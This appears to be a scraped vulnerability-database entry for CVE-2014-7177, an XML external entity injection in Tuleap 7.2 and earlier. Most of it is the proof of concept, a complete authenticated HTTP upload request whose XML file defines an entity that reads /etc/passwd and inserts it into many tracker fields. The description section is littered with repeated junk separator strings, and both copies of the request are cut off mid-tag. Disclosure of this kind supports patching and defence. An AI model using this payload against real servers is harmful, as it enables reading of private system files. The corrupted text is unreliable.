Tuleap 7.2 XXE Injection

32   2019-08-05 08:08   nipc
漏洞信息
漏洞编号: 1287
CVE编号: CVE-2014-7177
漏洞类型: -
漏洞来源: cxs
发布日期: 2014-10-29
CVSS
CVSS值: 4/10
严重级别: 高危
利用范围: Remote
攻击复杂度: Low
认证级别: Single time
漏洞描述

WLB-2014100176[***]http://cxsecurity.com/issue/WLB-2014100176[***]Bug: Tuleap 7.2 XXE Injection ( Ascii Version )[***]Tuleap 7.2 XXE Injection[***]2014.10.29[***]Jerzy Kramarz[***]High[***]N/A [***]CVE-2014-7177@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893********[***]No[***]Yes[***]4/10[***]2.9/10[***]8/10[***]Remote[***]Single time[***]Partial[***]None[***]None[***] Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** CVE: CVE-2014-7177@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Vendor: Enalean@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Product: Tuleap@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Affected version: 7.2 and earlier@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Fixed version: 7.4.99.5@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Reported by: Jerzy Kramarz@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Details:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** A multiple XML External Entity Injection has been found and confirmed within the software as an authenticated user.@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Successful attack could allow an authenticated attacker to access local system files. The following example vectors can@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** be used as PoC to confirm the vulnerability.@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Vulnerability 1:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** 1) Upload a XXE using the following request:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** POST /plugins/tracker/?group_id=102&func=create HTTP/1.1@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Host: [ip]@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Accept-Language: en-US,en;q=0.5@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Accept-Encoding: gzip, deflate@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Referer: https://[ip]/plugins/tracker/?group_id=102&func=create@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=4a8075ce16e338b4015405cfa2816319@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Connection: keep-alive@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Content-Type: multipart/form-data; boundary=---------------------------25777276834778@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Content-Length: 10561@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** -----------------------------25777276834778@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Content-Disposition: form-data; name="group_id"@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** 102@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** -----------------------------25777276834778@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Content-Disposition: form-data; name="func"@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** docreate@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** -----------------------------25777276834778@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Content-Disposition: form-data; name="group_id_templa

POC

Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap CVE: CVE-2014-7177 Vendor: Enalean Product: Tuleap Affected version: 7.2 and earlier Fixed version: 7.4.99.5 Reported by: Jerzy Kramarz Details: A multiple XML External Entity Injection has been found and confirmed within the software as an authenticated user. Successful attack could allow an authenticated attacker to access local system files. The following example vectors can be used as PoC to confirm the vulnerability. Vulnerability 1: 1) Upload a XXE using the following request: POST /plugins/tracker/?group_id=102&func=create HTTP/1.1 Host: [ip] User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://[ip]/plugins/tracker/?group_id=102&func=create Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=4a8075ce16e338b4015405cfa2816319 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------25777276834778 Content-Length: 10561 -----------------------------25777276834778 Content-Disposition: form-data; name="group_id" 102 -----------------------------25777276834778 Content-Disposition: form-data; name="func" docreate -----------------------------25777276834778 Content-Disposition: form-data; name="group_id_template" 100 -----------------------------25777276834778 Content-Disposition: form-data; name="tracker_new_prjname" Commencez à taper -----------------------------25777276834778 Content-Disposition: form-data; name="create_mode" xml -----------------------------25777276834778 Content-Disposition: form-data; name="tracker_new_xml_file"; filename="xee.xml" Content-Type: text/xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE str [<!ENTITY xxe SYSTEM "/etc/passwd">]> <tracker instantiate_for_new_projects="0"> <name>123&xxe;</name> <item_name>e123&xxe;</item_name> <description>123&xxe;</description> <cannedResponses/> <formElements> <formElement type="file" ID="F1" rank="0" use_it="0"> <name>attachment</name> <label>Attachments</label> </formElement> <formElement type="text" ID="F2" rank="2" use_it="0"> <name>details</name> <label>Original Submission</label> <description>A full description of the artifact&xxe;</description> <properties rows="7" cols="60"/> </formElement> <formElement type="string" ID="F3" rank="4" use_it="0" required="1"> <name>summary</name> <label>Summary</label> <description>One line description of the artifact&xxe;</description> <properties maxchars="150" size="60"/> </formElement> <formElement type="tbl" ID="F4" rank="6" use_it="0"> <name>cc</name> <label>CC</label> <properties hint="Type in a search term"/> <bind type="static" is_rank_alpha="0"/> </formElement> <formElement type="sb" ID="F7" rank="12" use_it="0"> <name>status_id</name> <label>Status</label> <description>Artifact Status</description> <bind type="static" is_rank_alpha="0"> <items> <item ID="F7-V0" label="Open"> <description>The artifact has been submitted&xxe;</description> </item> <item ID="F7-V1" label="Closed"> <description>The artifact is no longer active. See the Resolution field for details on how it was resolved.&xxe;</description> </item> </items> </bind> </formElement> <formElement type="sb" ID="F8" rank="14" use_it="0"> <name>assigned_to</name> <label>Assigned to</label> <description>Who is in charge of solving the artifact&xxe;</descriptio